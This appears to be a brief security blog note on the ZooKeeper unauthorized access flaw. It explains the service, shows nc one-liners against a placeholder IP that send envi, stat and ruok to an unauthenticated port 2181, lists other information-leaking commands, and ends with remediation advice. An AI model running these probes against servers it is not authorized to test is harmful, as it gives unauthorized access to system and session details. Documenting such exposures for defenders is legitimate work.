Zookeeper unauthorized access vulnerability exploit
1. Vulnerability introduction
ZooKeeper is a distributed, open source distributed application coordination service. It is an open source implementation of Google's Chubby and an important component of Hadoop and Hbase. It is a software that provides consistent services for distributed applications. The functions provided include: configuration maintenance, domain name services, distributed synchronization, group services, etc.
ZooKeeper is opened on port 2181 by default. Without any access control, an attacker can obtain a large amount of sensitive information about the system by executing the envi command, including the system name and Java environment.
I encountered it during vulnerability mining, so I recorded it.
2. Exploiting vulnerabilities
Use NC connection and execute envi to obtain sensitive information
ehco envi | nc xxx.xxx.xxx.xxx 2181
stat:列出关于性能和连接的客户端的统计信息。
echo stat |nc xxx.xxx.xxx.xxx 2181
ruok:测试服务器是否运行在非错误状态。
echo ruok |nc xxx.xxx.xxx.xxx 2181
reqs:列出未完成的请求
envi:打印有关服务环境的详细信息
dump:列出未完成的会话和临时节点
3. Repair method
Prohibit Zookeeper from being directly exposed to the public network
Add access control and choose the corresponding method according to the situation (authenticate user, username and password, specified IP)